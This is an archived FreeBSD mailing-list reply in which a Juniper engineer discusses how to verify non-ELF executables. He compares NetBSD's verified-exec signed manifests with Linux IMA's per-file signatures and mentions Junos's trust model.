Date: Mon, 23 Oct 2017 15:53:05 -0700 From: "Simon J. Gerraty" <sjg@juniper.net> To: Eric McCorkle <eric@metricspace.net> Cc: Ian Lepore <ian@freebsd.org>, "freebsd-hackers@freebsd.org" <freebsd-hackers@freebsd.org>, <freebsd-security@freebsd.org>, <freebsd-arch@freebsd.org>, <sjg@juniper.net> Subject: Re: Trust system write-up Message-ID: <72903.1508799185@kaos.jnpr.net> In-Reply-To: <e4fb486c-fe8a-571e-8c95-f5f68c44b77c@metricspace.net> References: <1a9bbbf6-d975-0e77-b199-eb1ec0486c8a@metricspace.net> <1508775285.34364.2.camel@freebsd.org> <e4fb486c-fe8a-571e-8c95-f5f68c44b77c@metricspace.net>
next in thread | previous in thread | raw e-mail | index | archive | help
Eric McCorkle <eric@metricspace.net> wrote: > > Any thoughts on how to validate executables which are not elf binaries, > > such as shell scripts, python programs, etc? > > I hadn't really thought in depth about it, as my main initial goal is > signed kernel/modules, but I have given it some thought... > > An alternative is something like the NetBSD veriexec framework, where Yes, as previously mentioned the verified exec model deals with this neatly, and btw is more efficient than signing individual files - as is needed with ELF signing etc. I think for linux based platforms using IMA we need to generate 20-30k+ signatures, vs about a dozen for platforms using verified exec, verification is also more expensive I'm told. > there's MACs for specific files. That stuff is mostly orthogonal to the > public-key approach I'm working on here, but there's possibly some > interplay. Yes, you use the public key stuff to sign the manifests containing the blessed fingerprints. This is what Junos has been doing for more than a decade. Your "trust" database, might be useful in being able to extend that to general use. The trust model we use for Junos is deliberately very restrictive and thus of most use to embedded vendors.
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?72903.1508799185>